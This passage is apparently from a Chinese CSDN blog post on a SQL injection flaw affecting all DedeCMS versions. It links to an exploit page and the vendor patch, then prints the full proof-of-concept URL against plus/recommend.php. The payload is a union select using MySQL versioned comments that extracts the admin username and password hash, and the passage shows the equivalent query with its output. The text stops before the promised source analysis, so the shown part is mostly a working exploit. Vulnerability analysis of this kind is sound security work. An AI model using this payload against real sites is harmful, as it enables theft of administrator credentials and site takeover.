[分析]-DedeCMS全版本通杀SQL注入漏洞_dedecmsv5.7 sp2 前台sql注入漏洞-CSDN博客

本文链接：https://blog.csdn.net/nixawk/article/details/24982851

本文详细探讨了DedeCMS全版本存在的SQL注入漏洞，提供了漏洞利用的POC链接，并分析了导致问题的源码部分。通过注入代码示例，揭示了如何在MySQL版本5.0.0以上执行union操作。同时，提到了两个安全相关的网站资源，供进一步研究。

摘要由CSDN通过智能技术生成

[利用]: http://p2j.cn/?p=798
[补丁]: http://www.dedecms.com/pl/#u20140228_5

---------------------------------------------------------------------------------------------------------------------

网络上公布的原始poc格式如下:

http://127.0.0.1/dedecms5.7/plus/recommend.php?&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111

注入成功，等效于执行下面代码:

mysql> SELECT s.*,t.* FROM 
    -> `dede_member_stow` AS s LEFT JOIN 
    -> `dede_member_stowtype` AS t ON s.type=t.stowname 
    -> WHERE s.aid='1' 
    -> AND s.type='\\' or mid=@`\\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `dede_admin` limit 0,1),5,6,7,8,9#@`\\'` ';
    -> ;
+----+-----+-----+-----------------------------+---------+------+----------+-----------+----------+
| id | mid | aid | title                       | addtime | type | stowname | indexname | indexurl |
+----+-----+-----+-----------------------------+---------+------+----------+-----------+----------+
|  1 |   2 |   3 | |admin|f297a57a5a743894a0e4 |       5 | 6    | 7        | 8         | 9        |
+----+-----+-----+-----------------------------+---------+------+----------+-----------+----------+
1 row in set (0.01 sec)

/*!50000union*/ 表示若mysql版本高于5.0.0，则执行union操作.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

下面分析以引